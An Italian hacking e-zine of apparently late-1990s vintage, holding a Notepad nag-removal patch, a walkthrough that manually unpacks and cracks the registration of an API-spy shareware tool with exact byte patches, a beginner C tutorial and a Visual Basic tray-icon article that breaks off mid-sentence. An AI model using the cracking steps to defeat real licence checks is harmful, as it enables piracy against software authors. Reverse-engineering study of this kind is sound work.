Ora io mi chiedo perch devo perdere 2 secondi della mia vita per cliccare su
"SI" ?

Ho messo mano a SoftIce e mi son dato da fare...

Nota bene: io ho la versione di Notepad per Win95, dovrebbe essere uguale
           anche per Win98 ma non ci giurerei, cmq il procedimento e' lo
           stesso...

Mettiamo innanzitutto un "BPX MessageBoxA" e cerchiamo di aprire un file di
testo molto ampio (la ezine per esempio), Sice poppera' torneremo quindi al
programma (Notepad) che ha effettuato la call pigiando F11 Ci troveremo qui:

:00402D55 8B7508          mov esi, dword ptr [ebp+08] <-  
:00402D58 6A00            push 00000000               <- Parametri x
                                                         MessageBox
:00402D5A FF35B0604000    push dword ptr [004060B0]   <- 
:00402D60 56              push esi                    <-               
:00402D61 FF1530744000    Call dword ptr [00407430]   <- Call alla
                                                         MessageBox

Seguito da due istruzioni che controllano la scelta da noi fatta "Si" o "No",
nel caso in cui rispondiamo "Si" il jump (jnz/jne) non  attivo e prosegue
con l'istruzione seguente...

:00402D67 83F806                  cmp eax, 00000006
:00402D6A 0F85A9000000            jnz 00402E19
:00402D70 6804010000              push 00000104

Ora cancelliamo il precedente breakpoint con "bc *".

Il modo di procedere  lo stesso per rimuovere un qualsiasi nag, io preferisco
far jumpare il tutto andando direttamente all'istruzione corretta, ma volendo
potete noopare la call e cambiare il jne (jnz).

Apriamo il Notepad.exe con Hiew e andiamo alla nostra call (00402D60)
scorrendo con pagina giu', modificheremo quindi qualche istruzione sopra
facendo in modo che il programma apra automaticamente il WordPad.

Si tratta quindi di trasformare:

:00402D55 8B7508                  mov esi, dword ptr [ebp+08]

(o un' altra linea)

In:

:00402D58 E913000000              jmp 000402D70

Possiamo farlo a mano o avvalerci delle funzionalit di hiew posizionandoci
sull'istruzione e premendo F3 (modifica) e F2 (asm) inserendo poi

"jmp 000402D70" che e' l'istruzione dopo il jump  (quella a cui si andrebe
                                                   cliccando su SI)

Ecco tutto, vi avevo preventivato che era una cazzata, ma ci aiuta a ritrovare
il vero spirito del reversing, di coloro che vogliono cambiare cio' che non
gli piace...


On IRCnet : #crack-it ; #aisprod
On ICQ : 52067095
E-Mail : g0lem@SoftHome.com ; g0lem@hotmail.com

---Golem---

---------------------------------------------------------------[ cRacKinG ]---
===] LADDOVE PROCDUMP FALLISCE ARRIVA QUE :)]=================================
-----[ Quequero ]-------------------------------------------------------------
                                                                              
(Manual unpacking e cracking)

Checkov disse: le donne senza gli uomini appassiscono,
Bellissimo il tutorial di questo Quequero...:) scherzo, vi presento un tute 
che dovrebbe piacervi assai :)...ciauzzz gli uomini senza le donne diventano 
matti!...Bh aveva ragione :) 

Home page: http://www.uic-spippolatori.com
E-mail: UIC@mail.usa.com 

-]Difficolt [-
 
( )NewBies (X)Intermedio ( )Avanzato ( )Master 
   

Siete pronti per unpackare un programma senza il procdump? 
Allora viaaaaa!!!!!.

------------------------------------------------------------------------------

=] Introduzione [= 
 
Unpackeremo manualmente e crackeremo un meraviglioso ed utilissimo tool 

=] Tools usati [=
 
-SoftIce qualunque versione 
-ADump 
-ProcDump 
-Hex-Workshop 3.01 o qualunque altro Hex-Editor 
-Dei foglietti di carta e la calcolatrice di wintonno...una penna...
 Si, il sangue va bene lo stesso :) 

=]URL o FTP del programma [=
 
http://www.uic-spippolatori.com sezione tools
 
=] Notizie sul programma [= 
 
Il pargolo  un piccolo ApiSpy, cio uno di quei programmini che ti dico le 
api che usano gli altri programmini :) ottimo anche come monitor durante il 
cracking 

=] Essay [=
 
Salve a tutti raga, scaricate ed installate questo magnifico programmino....
avviatelo e vedrete un brutto nag con scritto UNREGISTERED....non ci piace, 
poi viene una messagebox che ci avvisa che il programma non  registrato e poi
troviamo anche un pulsante "register".....come se non bastasse non possiamo 
salvare nel log pi di venti chiamate......e che kazzo, non ci potevano mette
pure qualche funzione che ti faceva esplodere il pc se avviavi il pc troppe 
volte? :)...hehe non disperate, siamo qui per porre rimedio a questi problemi,
il programma  il paziente malato e noi siamo i chirurghi con manie da jack 
lo squaratore......Apis32.....TREMAAAAAAA :)!!!!!!! 

Basta cazzate, iniziamo......Il programma  packato e questo lo si nota 
soprattutto perch se settiamo un breakpoint quello non dura neanche un 
microsecondo...se poi disassembliamo il programma, bh ancora peggio. 
Aprite quindi procdump e facendo finta che non esiste il GetTyp provate tutte
le combinazioni dei packer...vedrete che il file viene unpackato da 
"petite < 1.3", bene, avviate il file.....dho! Non parte....mmmm sta cosa non
ci piace....io che sono un tipo che non pensa ma agisce (un po' come una 
capra) ho detto: "Okkei ti unpacko a mano" ricordandomi solo ora che era 
possibile far funzionare il file del procdump solo dopo alcune modifiche...
oki, andiamo avanti. 
Aprite adump da un prompt di dos e premete "R", dovreste avere qualcosa di 
simile: 
  
:r
Internal variables:
-------------------
STARTOFFS: 0x8423F000   <---Questo ci interessa parecchio
ENDOFFS: 0x84333240
LIMIT: 0xF4240 (1000000 )
CUROFFS: 0x8423F000
MAPFN: C:\WINDOWS\TEMP\ADump.log
MAPFSIZE: 0xF4240
ANFILTER: A..Z,a..z,0..9
:

(mi raccomando non chiudete il programma...il caro adump non fa altro che 
mappare in memoria un file di un mega e 0x8423F000  l'offset di inizio di 
questo file...ci servir dopo per dumpare i dati dell'apispy...aprite l'hex 
workshop ed andate all'entrypoint del programma (D400h) sostituite il primo 
byte con CCh ( l'opcode di Int3), salvate il tutte ed uscite.....aprite sice
(ctrl+d) mettete un breakpoint sull'interrupt 3 (bpint 3) e chiudete sice, 
avviate adesso apisspy e appena sice poppa scrivete: e eip 66 
in questo modo rimettete il byte originale al suo posto visto che prima 
l'avevamo cambiato in CC, fatto ci avrete davanti due push ed una chiamata:
 
:0041A000 CC                       int 03 <----Questo l'abbiamo settato prima 
:0041A001 9C                       pushfd 
:0041A002 60                       pushad 
:0041A003 E8CA000000  call 0041A0D2 <----Questa  la chiamata che dobbiamo 
                                         esaminare 
:0041A008 0300 add eax,  dword ptr [eax] 
                                         
entrate nella call con F8 e date vita ad un estenuante step finch non 
arriverete qua 

:004055C0 55            push ebp <----Questo  l'entry point originale, ma 
                                      l'indirizzo dell'entry lo trovate in 
                                      eax (1A000h) 
:004055C1 8BEC          mov ebp, esp 
:004055C3 6AFF          push FFFFFFFF 
:004055C5 6810804000    push 00408010 
:004055CA 6818544000    push 00405418 
:004055CF 64A100000000  mov eax, dword ptr fs:[00000000] 
:004055D5 50            push eax 
  
Adesso potremmo iniziare il dump visto che siamo arrivati all'entrypoint 
originale cio quello del programma non packato...ma come faccio a dirlo? 
In genere i packer arrivano ad un jmp eax e quello significa stanno per 
arrivare all'entry originale, in questo caso per non possiamo basarci su 
questo "trick" per possiamo notare due cose: 

1) Scorrendo il listato in sice vediamo molte api che sicuramente non servono
   al packer 
2) Guardando la barra verde in basso a sice scopriamo che siamo passati dalla 
   sezione .madmat alla .text 

capito ora? La sezione che ci interessa  sempre la .text o la .CODE, a questo
punto iniziamo il dumping, per prima cosa dobbiamo controllare che tutte le 
pagine da dumpare sono in memoria e dobbiamo anche sapere quanti byte dobbiamo
dumpare......arrivati qui scrivete in sice: task 
ed avremo la lista di tutte le applicazioni attive, la nostra  ovviamente 
api32, quindi scrivete: map32 apis32 ed avrete una lista completa di tutte le
sezioni: 
  
Owner    Obj Name  Obj#        Address                  Size 
Apis32   .text     0001       015F:00401000 Offset:    0000F000 
Apis32   .idata    0002       0167:00410000 Offset:    00001000 
Apis32   .rsrc     0003       0167:00411000 Offset:    00009000 
Apis32   .madmat   0004       015F:0041A000 Offset:    0000D268 
  
per prima cosa calcoliamoci il numero di bytes da dumpare, quindi fate cosi: 
Rva ultima sez - imagesize +1000 
in sice diventa: ? 41A000-400000+1000 = 1B000 

1000  la lunghezza del PE, quindi il nostro file UNPACKATO sar lungo 
1B000h bytes, adesso vediamo quante pagine di memoria occupa tutto il 
programma e sopratutto vediamo quante pagine non sono in memoria, aprite la 
calcolatrice di windows e, sapendo che ogni pagina di memoria occupa 
4095bytes cio FFFh scriviamo: lunghezza programma / FFF 
1B000/FFF = 1B....il programma occupa 27 pagine di memoria, quindi vediamo se
sono tutte presenti, per questo useremo la funzione "page" partendo 
dall'indirizzo 400000: 
page 400000 L 1b 
bene, bene, se la pagina  presente vedrete qualcosa di simile: 

00400000    023a9000   P    A  U  R  Private 
se invece  assente vedrete: 00400000   NP  023a9000 
scorrete tutta la lista e scoprirete che molte pagine non sono presenti, la 
prima  400000, segnatevi tutte quelle assenti su un foglietto e poi scrivete:

pagein 400000 
pagein 418000 
pageun 419000 
pagein 41A000 

ripeterete tutto questo per tutte quante le pagine assenti....fatto ci avremo
il programma bello e pronto da dumpare, per farlo dobbiamo trasferire tutti i
suoi byte dalla memoria al file mappatoci da adump, in questo modo: 

m address1 L address2 

che per noi diventa: m 400000 L 1B000 8423F000 <---Questo  l'offset che ho 
                                                   evidenziato poco sopra 

bene, adesso andiamo in adump (se l'avete chiuso so' cavoli vostri, dovete 
riniziare :) alla riga di comando scrivete: 

w c:\unpacked.exe 1B000 8423F000 

che significa: scrivi nel file "unpacked.exe" 1B000 bytes che trovi all'offset
8423F000......adesso abbiamo il file unpackato ma non lo runnate che non 
funziona, per prima cosa dobbiamo rimettere a posto l'entry originale, quindi
aprite procdump, pe editor, unpacked.exe....bh l'entry sta a posto  quello 
giusto cio 1A000, ma dobbiamo comunque riallineare il file, quindi clickate 
su sections e editate ogni section ponendo la Psize uguale alla Vsize e 
l'Offset uguale all'RVA, se in pratica avete questo: 

Vsize: 00001000     RVA: 00001000 
Psize: 00000940     Offset: 00002567 
  
dovete trasformarlo in questo: 

Vsize: 00001000     RVA: 00001000 
Psize: 00001000     Offset: 00001000 
  
se avete fatto bene il lavoro per tutte le sezioni ed avete premuto F5 per 
aggiornare il desktop vedrete allora riapparire l'icona originale ed il file 
funzioner a meraviglia (le sue dimensioni devo essere: 110.592 bytes) 
  
La prima parte  terminata, adesso possiamo crackare il programma...se avessi
tempo vi farei trovare il seriale ma non posso, vado di fretta... 
  
Per prima cosa premete il pulsante register ed inserite un nick ed un 
numero....mettete un bp su getdlgitemtexta (bpx getdlgitemtexta) e poi premete
invio....appena entrati premte F11 e non fermatevi l, steppate per 16 volte 
con F12 ed arriverete qui: 
  
:0040174A                           push 00409038 
:0040174F                           push 0040D1E0 
:00401754                          Call lstrcatA 
:0040175A                          push 00409328 
:0040175F                          push 0040D1E0 
:00401764                          Call lstrcatA 
:0040176A                          call 004046A0 

:0040176F A374CE4000 mov [40xxxx], eax <-----Perdonatemi le xxx ma non me lo 
                                             ricordo quale era l'indirizzo 
:00401774  EB01               jmp 00401777 
  
dopo la chiamata a 4046A0 viene mosso nel buffer il valore riportato da eax 
(il solito leim 1 se  esatto e 0 se non lo ), a questo punto proviamo ad 
alterare il valore di eax e mettiamoci 1, subito dopo c' un piccolo trick 
SMC che decide se saltare alla beggar off oppure no, eccolo: 

:00401774 EB01       jmp 00401777 
:00401777 B80AC07402  mov eax, 0274000A 
:0040177B EB2C jmp 004017A9 
  
ora ve lo spiego: quel jump vorrebbe saltare all'indirizzo 401777 che come 
vedete non  rappresentato ma ovviamente c' :), il programma allora salta 
effettivamente a quell'indirizzo scindendo l'opcode B80AC07402 in: 

B8 
0AC0 
7402 

solo che B8 dal significato nullo viene saltato e 0AC0 e 7402 diventano: 

:00401774 EB01    mp 00401777 
:00401776 B8          BYTE B8 <---Questo byte viene ignorato dal jump 
:00401777 0AC0      or al, al <---Al = 0 
:00401779 7402    je 0040177D <---Beggar Off 
:0040177B EB2C   jmp 004017A9 
                              
noi non dobbiamo far altro che cambiare non quel byte ma l'sitruzione sopra, 
cio, prendete "mov [40xxxx], eax" e cambiatelo in "mov eax, 1".....quindi 
aprite l'exe ed andate nel programma a cercare questi bytes: A374CE4000EB01, 
ce ne sono due nel programma e cambiateli in: B801000000EB01 (lo stesso 
identico trick lo ritrovate a 401F39, cambiatelo senn il programma non si 
cracka)...Avremmo potuto cambiare direttamente i byte del trick ma non mi 
andava :).....e non rompete che il tute lo sto a fare io :)....uscite da sice
e.....track...programm registrato..riavviatelo e riavrete (ovviamente) la 
scrittina registered....chiudete il tutto e mettete un break su 
RegOpenKeyExA...clickate sul programma e steppate cpn F5 finch non vedrete 
apparire il loghetto conl'ape ancora senza scritte....appena arrivate a 
questo punto cancellate i bp, premete F11 ed arrivate qui: 

:00404815 03EA add ebp, edx 
:00404817 41 inc ecx 
:00404818 4E dec esi 
:00404819 75DA jne 004047F5 
:0040481B 33C0 xor eax, eax 
:0040481D 5F pop edi 
:0040481E 85ED test ebp, ebp 
:00404820 5E pop esi 
:00404821 5D pop ebp 
:00404822 0F94C0 setz al <---Azzera AL se il flag Z  attivato 
  
dovete solo cambiare quel setz al in "mov al, 1 nop"..ecco l'opcode: 
B00190..sostituitelo al nel file ed il programma sar finalmente crackato. 

ciauzzzzzzzzzzzzzz.........Ah, non dimenticatevi dopo il crack di clickare su
register, inserire il vostro nick ed un qualunque numero pi lungo di 16 
cifre 
  
=] Note finali [=  

Grazie tantissime a Neural_noise che mi ha insegnato molto sul manual 
unpacking, kill3xx e tutt quanti gli altri...scusate ma ho una fretta 
boia.......ciauzzzzzzzzzzzzz

=] Disclaimer [=
 
Vorrei ricordare che il software va comprato e  non rubato, dovete registrare
il vostro prodotto dopo il periodo di valutazione. Non mi ritengo responsabile
per eventuali danni causati al vostro computer determinati dall'uso improprio
di questo tutorial. Questo documento  stato scritto per invogliare il 
consumatore a registrare legalmente i propri programmi, e non a fargli fare 
uso dei tantissimi file crack presenti in rete, infatti tale documento aiuta 
a comprendere lo sforzo immane che ogni singolo programmatore ha dovuto 
portare avanti per fornire ai rispettivi consumatori i migliori prodotti 
possibili. 
Noi reversiamo al solo scopo informativo e di miglioramento del linguaggio 
Assembly. 
Capitoooooooo????? Bh credo di si ;))))  

---Quequero---

------------------------------------------------------------[ prOgRamMinG ]---
===] C TUTORIAL [=============================================================
-----[ adr3 ]-----------------------------------------------------------------

Sarebbe x beginners.. ma se sapete gia programmare in c e avete voglia di
farvi 4 risate..

PARTE 1: CAXXATE *MOLTO* DI BASE 

INGREDIENTI: il mio pc (cioe', quello ke ne resta.. la skeda audio e' da 
qualke parte sul pavimento :( ,e il monitor e' in fin di vita..), vi,
3 cicche, skifezze varie da mangiare..

TEMPO DI PREPARAZIONE: 25 min del mio PREZIOSISSIMO TEMPO (hehe) + almeno il 
doppio x ritovare il file prima di spedirlo.. :(

AVVERTENZE: 1 dose eccessiva puo causare convulsioni!! [ke poi  il mio
stato "nauturale"] %)

ok, basta kaxxate ora inizio sul 'serio'.. 
bhe, a dire la verita' questo tute non era previsto xke' ne avevo preparato 1 
sul cracking, ma poi ho letto gli articoli di gente moltooo + brava di me e ho
ripiegato sul programming [sisi ma a noi ke ce ne frega?!?]. Vabbe, il 
linguaggio non lo presento visto ke almeno di fama lo konoscete tutti.. vero? 
[no? kome NO? :P] siccome la teoria non e' proprio il mio massimo inizio  
scrivendovi qualkosa di kretino.. Questo programmino stampa solo 3 frasi sullo
skermo..

#include <stdio.h>

main(){
                        printf("Nella migliore tradizione dei tute..\n");
                        printf("Il nostro prog dira':\n");
                        printf("\t\t\tHELLO WORLD!!!\n");
                        return (0);
}

don't worry ora spiego tutto..
-1 #include <stdio.h> :  include [appunto?!] 1 header nel file del programma..
in pratica, rende disponibili al programma tipi, strutture, funzioni etc.. 
descritte nel file d'include. L'header ke abbiamo karikato qui e' stdio.h e  
contiene principalmente funzioni ke si okkupano delle operazioni base di I/O. 
Il simbolo # all'inizio della riga indica ke questa riga del codice e' 1 
direttiva al preprocessore. (oltre all'#include abbiamo anke, ad esempio il 
#define, l' #ifdef, ecc)

-2 main() : e' la dikiarazione della procedura principale del programma, 
quella
ke viene automaticamente eseguita all'avvio. La sintassi corretta x la 
descrizione di 1 funzione e':

 <tipo-funzione> <nome-funzione> (<tipo-1parametro> <1parametro>
                                                  <tipo-2parametro>..)

nel nostro kaso, quindi potrebbe -dovrebbe-  essere:
int main (void)
il tipo "void" indica 1 funzione ke non ritorna nessun valore e,se messo tra 
le 
parentesi, ke non accetta parametri. La funzione e', naturalmente, contenuta 
nel
blocco tra { e } (ma pure questo vi devo di??)

3-4-5  printf("stringa\n"); : con queste 3 istruzioni stampiamo delle frasi 
sullo skermo e, con "\n" aggiungiamo 1 linefeed -andiamo a kapo, in pratica-. 
Quel \n e' infatti 1 sequenza di escape, introdotta  dal carattere  "\"..

aLcUne sEqUeNzE Di eScAPe
\0                                                                 codice NULL
\n                                            codice LF (il nostro amiko.. :))
\r                                                 codice CR (carriage return)
\t              tabulazione orizzontale (abbiamo usato anke questa!! riga 5..)
\v                                 tabulazione verticale (indovinate ke fa?..)

La funzione ke abbiamo usato x la stampa e' la printf(), definta in stdio.h
(l'abbiamo karikato all'inizio.. ) L'output e' tutto quello contenuto tra ""
(naturalmente le sequenze di escape non vengono stampate..)
Nonostante l'apparente semplicita, la printf() e' 1 funzione piuttosto
flessibile xke' ci permette, ad esempio, di formattare l'output e di definire
il dipositivo di uscita (stdout,stderr,stdaux,stdprn..)

6- return (0); : l'istruzione return ci consente di uscire da 1 funzione, 
ritornando al kiamante. se la funzione non  dikiarata void possiamo definire
il valore da restituire alla funzione kiamante; questo valore pu essere una 
costante, una variabile o, in generale, un'espressione (anche una chiamata a 
funzione). 
Se siamo sotto dos, il valore restituito dalla funzione main viene restituito 
direttamente al SO ke lo rende disponibile tramite l'ERRORLEVEL.

[hihi ke roba.. se kontinuo cosi sembrera' quasi ke sappia l'italiano!! :)]

ok.. abbiamo detto ke per dikiarare 1 funzione si deve definirne il "tipo". 
anke le variabili del programma sono identificate da 1 nome e dal tipo a cui 
appartengono.. In c, ci sono 4 tipi PRIMITIVI -ve li skrivo in ordine 
krescente 
di dimensione..

char              | carattere singolo
int               | intero normale
float             | virgola mobile a singola precisione
double            | virgola mobile a doppia precisione
 
i tipi primitivi si combinano poi con i qualificatori, cioe unsigned, 
short e 
long. (vabbe dai, questo supplizio ve lo evito). 

[APERTA PARENTESI]
I tipi di dati elementari e le loro  dimensioni dipendono molto 
dall'arkitettura del sistema. La dimensione di 1 tipo o di 1 variabile 
ricavabile tramite la funzione sizeof(). [ad esempio x  arkitettura i386
sizeof(int)=32 bit)]
[KIUSA PARENTESI]

*LE VARIABILI*
Allora.. spero ke tutti sappiate cos'e' 1 variabile.. kome non lo sapete? bhe,
1 variabile e' in sostanza 1 area di memoria di 1 certa dimensione 
identificata 
da 1 nome, e a cui e' possibile assegnare un valore (definizione moltooo 
odiosa, sembro il mio profe di informatica :PP). La sintassi x dichiarare 1
variabile e':

<tipo-variabile> <nome-variabile> (= <valore>);

esempi..
int numero;     /* ah.. questo  1 kommento :) */
int volte_che_ho_riscritto_questa_riga = 5;
char risposta= 's'            

Notare ke il carattere assegnato a risposta e' rakkiuso tra ' ' e non tra " "!
Un carattere alfanumeriko rakkiuso tra apici singoli rappresenta infatti 1 
kostante carattere. Gli apici doppi rakkiudono invece stringhe, ke sono in 
pratika array di caratteri [questa ve la spiego nella seconda parte, se ci 
sara 
;P]

Ok, ora faccio qualke esempio su ste benedette variabili...

#include <stdio.h>

int main(){
                               int num=1;   /* dikiarazione delle variabili */
                            char lettera;
     
             printf("Num vale %d\n",num);
                                   num++;       /* num e' incrementato di 1*/
      printf("Ora invece vale %d\n",num);
                             lettera='A';                      
      printf("Lettera e' %c, ovvero %d in decimale\n",lettera,lettera); 
                                                       num=666;
                              printf("Num e' %d, cioe %X in hex",num, num);
                      /* num viene stampato in formato sia dec ke hex*/
                                                      return (0);
}      
[la smettete di ridere?!  solo 1 esempio!! :)]
questo hmm.. BELLISSIMO programma stampa i valori delle variabili num e 
lettera in diversi formati.. [bhe, + o -] 
Ad esempio, il carattere assegnato alla var lettera apparira kome 'A' o kome 
65 a sekonda della specifika di stampa definita.. la metavariabile %d 
formattera il valore kome intero signed in base 10, la %c kome carattere 
singolo, la %x kome  intero unsigned hex.. 
Avete notato l'istruzione num++ ?? quel ++ dopo la variabile  1 operatore ke 
incrementa il valore di una variabile numerica di 1 unita..

aLcUnI oPeRaToRi (con <v> si intende 1 variabile o cmq 1 valore generiko):
<v>--		decrementa di 1 unita' il valore dell'operando
<v1>+<v2>                       somma 2 operandi (stessa sintassi x -,*,/)
<v1>%<v2>        resto della divisione tra v1 e v2 (in pratika, v1 mod v2)
<v1>&<v2>                                               AND bit x bit
<v1>|<v2>                                               OR  bit x bit
<v1>^<v2>                                               XOR bit x bit
~<v>		complemento a 1

[hii basta!! ce ne sono altri ma non mi va + di skriverli!!]

*I PUNTATORI*
[Acc.. e mo?!? Aspettate ke penso all'introduzione.. hem.. ]
Ogni variabile, di qualsiasi tipo, rappresenta 1 valore contenuto in una certa
locazione nella memoria del sistema.
Una puntatore ad 1 certa variabile contiene semplicemente tale indirizzo.

esempio [io non c'avrei kapito nulla skritto kosi %|]:

int numero; 		// variabile di tipo int
int *puntatore;                // variabile puntatore (notare l'asterisko!)
...
numero=10;	
puntatore=&numero;          // ora puntatore kontiene l'INDIRIZZO di numero
*puntatore=16;		// equivale quindi a numero=16

una variabile puntatore e' simile ad una variabile normale, ma viene 
dikiarata kon l'aggiunta di 1 *.
Per indicare la posizione in memoria di una variabile si usa il simbolo &.
Per indicare il valore contenuto in un indirizzo di memoria si usa invece il 
simbolo *.
Dopo l'istruzione puntatore=&numero, puntatore contiene l'indirizzo di numero.
Dato ke per riferirsi al valore contenuto in un indirizzo di memoria, 
usiamo l'*,  indifferente fare:
numero=16;                   oppure..                     *puntatore=16;

esempietto.. [ankora?? BASTAAA]

#include <stdio.h>

int main(){
                                                  char lettera;

                                               printf("Scrivi 1 lettera:  ");
                                                 scanf("%c \n",&lettera);
	return 0;
}                 
scanf() e' la funzione per gestire l'input dalla tastiera definita in stdio..
%c indica alla funzione ke ricevera' in input 1 carattere, da mettere 
messo nella locazione di memoria dove si trova numero..
quindi se p=&numero
sarebbe stata la stessa kosa scrivere 
scanf("%c \n",&numero);  o..        scanf("%c \n",p);

tutto kiaro? spero di si, non credo di saperlo spiegare meglio di kosi :(

tHiS iS tHe eNd!! [mitiko Jim :))]
Quest'affare e' abbastanza lungo da sembrare decente kome 1 parte..
Se avete trovato il tute alquanto kretino.. bhe, io vi avevo avvertito ke
era x beginners, se volete la prossima volta skrivo qualkosa di + tecniko.
Se nonostante la spiegazione continuate a trovarlo cretino e volete
dirmelo in faccia scrivetemi a acidjm@yahoo.it [niente fake-mail o
remailer senno kome faccio a rispondere agli insulti?? :))]
ciauzz, 			

---adr3---

------------------------------------------------------------[ PrOGrAmMinG ]---
===] IL SUBCLASSING ]=========================================================
-----[ R A M S E S ]----------------------------------------------------------
                                                                          
INDICE
======

1.1.1 | Piccole nozioni iniziali |

2.1.1 | La struttura del messaggio |

3.1.1 | Dal grossoemuscoloso alla TrayNotifyWnd |
- 3.2.1 La Shell_NotifyIcon
- 3.3.1 La struttura di NOTIFYICONDATA

4.1.1 | Inseriamo questa malefica di un'icona | 

5.1.1 | Un ulteriore passo |

6.1.1 | L'ultima frontiera |

7.1.1 | I menu |

8.1.1 | Gli esempi |
- 8.2.1 1 esempio
- - 8.2.2 Perche' l'utilizzo di AddressOf?
- 8.3.1 2 Esempio
- 8.4.1 3 Esempio

9.1.1 | Manteniamo la promessa :) |

10.1.1 | How to Contact me |

====
FINE

..............................
1.1.1 Piccole nozioni iniziali
==============================
Salve raga,
questo e' il mio primo testo che scrivo per AIS quindi perdonate se questo 
articolo possa diventare noioso.
Cmq cominciamo subito...
Questo testo si prefigge di insegnarvi in modo molto semplice ma nello stesso
tempo completo come inserire l'icone da una qualsiasi delle vostre 
applicazioni sulla tray senza modificare il programma stesso (e senza rifarlo)

Prima di tutto bisogna che capiate bene cosa significa cio' che stiamo facendo
e come funziona tutto cio' visto che solo sapere come si fa non serve a molto.
Quando l'utente esegue qualche operazione viene generato un evento.
Questi eventi sono risposte a operazioni svolte da qualcuno sul PC come la 
pressione di un tasto. Questi eventi sono il piu' delle volte programmabili 
in Visual Basic.

Ad esempio (gli esempi sono sempre difficili per me), se sputi in faccia a 
qualcuno lui si incazzera' come una iena incazzosa e ti spacchera' il muso; 
quindi possiamo anche scrivere un programma di questo tipo:

listato 1
--------------------------------------------
Private Sub grossoemuscoloso_sputainfaccia()
  grossoemuscoloso.incazzaturamode = true
End Sub
--------------------------------------------

Quindi noi abbiamo agito sull'EVENTO:
sputainfaccia()
ed abbiamo settato l'evento generato come:
grossoemuscoloso.incazzaturamode = true

Oltre a questo noi possiamo anche aggiungere cio' che vogliamo per rendere la
nostra applicazione migliore ma questo sta a voi, sbizzarritevi come volete, 
ora vi faccio un esempio:

listato 2
--------------------------------------------
Private Sub grossoemuscoloso_sputainfaccia()
  grossoemuscoloso.incazzaturamode = true
  continue
End Sub

Private Sub continue()
  Do While sputatoreresponse <> ""
  DoEvents
End Sub
--------------------------------------------

Abbiamo detto quindi all'eventoi settato in precedenza che oltra a doversi 
incazzare doveva anche continuare battere lo sputatore finche' la sua 
risposta non fosse diversa da "" (quindi non ci fosse risposta eheh).
Spero di essere riuscito a farvi capire come funge la cosa a grandi linee. 
Ora rimane ancora qualcusa da stabilire (prima di passare al vero programma) 
ossia come si passa dall'azione svolta dall'operatore all'evento da generare?
Bellissima domanda (beh, l'ho fatta io!!!eheh). 

La risposta e' semplicissima, come tutto il resto che vedremo se faremo passi
piccoli per volta, al momento della pressione del tasto viene inviato un 
messaggio che corrisponde all'evento. La finestra elabora il messaggio e se 
lo riconosce (quindi il programma e' corretto) viene generato questo 
benedetto evento. Ora cominciamo finalmente la parte piu' tecnica diciamo.

................................
2.1.1 La struttura del messaggio
================================

Il messaggio di cui parlavamo precedentemente ha una sua struttura in VB ed 
e' questa:

hWnd ----> Questo e' l'handle della finestra che riceve il messaggio. 
     
Ma cos'e' l'handle? 
Ecco la definizione: valore intero univoco definito dall'ambiente operativo e
utilizzato dal programma per identificare e accedere a un oggetto, ad esempio
un form o un controllo. Abbastanza chiaro mi sembra ma piu' semplicemente un 
numero che identifica un controllo (cmq dopo vedremo anche un esempio per
capire).

La sua Sintassi e': oggetto.hWnd
Semplicissimo quindi. Per altre informazioni superflue al nostro scopo potete
cmq fare capo all'help in linea di Visual Basic.

uMsg ----> Identificatore dell'evento (messaggio). E' sempre un identificatore
           univoco.
wParam --> Ulteriori informazioni.
lParam --> Ulteriori informazioni.

Ora non preoccupatevi di tutto questo perche' lo vedremo in dettaglio e senza
neanche accorgervene lo avrete gia' capito.
Esempio:
Se faccio click col tasto destro (o sinistro per i mancini come me) sul nostro
controllo grossoemuscoloso il messaggio generato sara' di questo tipo:

hWnd ----> grossoemuscoloso.hWnd
uMsg ----> WM_LBUTTONCLCK = 515 (oppure WM_RBUTTONCLCK)

.............................................
3.1.1 Dal grossoemuscoloso alla TrayNotifyWnd
=============================================

La taskbar non e' altro che una finestra di Windows con qualche proprieta' 
particolare, infatti e' sempre in pprimo piano, non presenta la caption, non 
possiede i pulanti di massimizzazione e minimizzazione e non puo' essere 
spostato ovunque nello schermo ma solo lungo i bordi dello stesso.
La sua composizione e' la seguente:

1) Un elemento button (Il pulsante Start o Avvio)
2) Un elemento ToolbarWindow32 (solo per Windows 98 o Windows 95 con 
   installato Microsoft Internet Explorer 4 o superiore, ossia quella piccola 
   barra che contiene le icone per una rapida esecuzione dei programmi).
3) Un elemento SysTabControl32 (dove appaiono le finestre correntemente 
   attive).
4) Un elemento TrayNotifyWnd (ossia cio' che interessa a noi, quella piccola 
   parte della barra vicina all'orologio di sistema su cui sono poste alcune 
   icone di programmi che le aggiungono).

Tutte le operazioni che si effettuano e che effettueremo all'interno della 
TrayNotifyWnd sono gestite dalla funzione Shell_NotifyIcon il cui prototipo 
in VB e':

...........................
3.2.1 - La Shell_NotifyIcon
===========================

listato 3
------------------------------------------------------------------
[Public] [Private] Declare Function Shell_NotifyIcon Lib "shell32" 
    Alias "Shell_NotifyIconA"
(ByVal dwMessage As Long, pnid As NOTIFYICONDATA) As Boolean
------------------------------------------------------------------

Bella roba vero? eheh
Ora vediamo i parametri che sono insiti in questo prototipo:

dwMessage ----> Identificatore del messaggio che puo' essere uno dei seguenti:

tabella 1  -----------------------------------------------------
           | Identificatore |Utilizzo                          |
           -----------------------------------------------------   
           |NIM_ADD         |Aggiunge un'icone nella tray...   | 
           ----------------------------------------------------- 
           |NIM_DELETE      |Distrugge un'icone (cancella)     |     
           -----------------------------------------------------      
           |NIM_MODIFY      |Midifica l'icona                  |       
           -----------------------------------------------------

ipData -------> E' un puntatore ad una struttura del tipo Notifyicondata

OK, ora sappiamo anche del prototipo di NOTIFYICONDATA, ma ora dobbiamo anche
conoscerne la struttura.

......................................
3.3.1 - La struttura di NOTIFYICONDATA
======================================
Ecco qua la sua struttura:

listato 4
---------------------------------------
[Public] [Private] Type NOTIFYICONDATA
cbSize As Long ------------------> Dimensione della struttura con sintassi:
                                   Len(espressione).
hwnd As Long --------------------> Arridaie', il solito handle.
uID As Long ---------------------> Identificatore dell'icona nella tray.
uFlags As Long ------------------> Serve per indicare quali altre proprieta' 
                                   sono stato impostate con volori validi e 
                                   puo' essere:

tabella 2
         ----------------------------------------------------
         |Identificatore |Utilizzo                          | 
         ---------------------------------------------------- 
         |NIF_ICON       |Il parametro hIcon e' stato impo -|
         |               |stato.                            |         
         ---------------------------------------------------       
         |NIF_MESSAGE    |Il parametro uCallBackMessage e'  |   
         |               |stato impostato.                  |      
         ----------------------------------------------------      
         |NIF_TIP        |Il parametro szTip e' stato impo -|     
         |               |stato.                            |
         ----------------------------------------------------

uCallbackMessage As Long --------> Definisce l'identificatore per il messaggio
                                   che il sistema inviera' alla finestra 
                                   specificata (identificata dal parametro 
                                   hwnd) ogni qual volta vi e' un evento del 
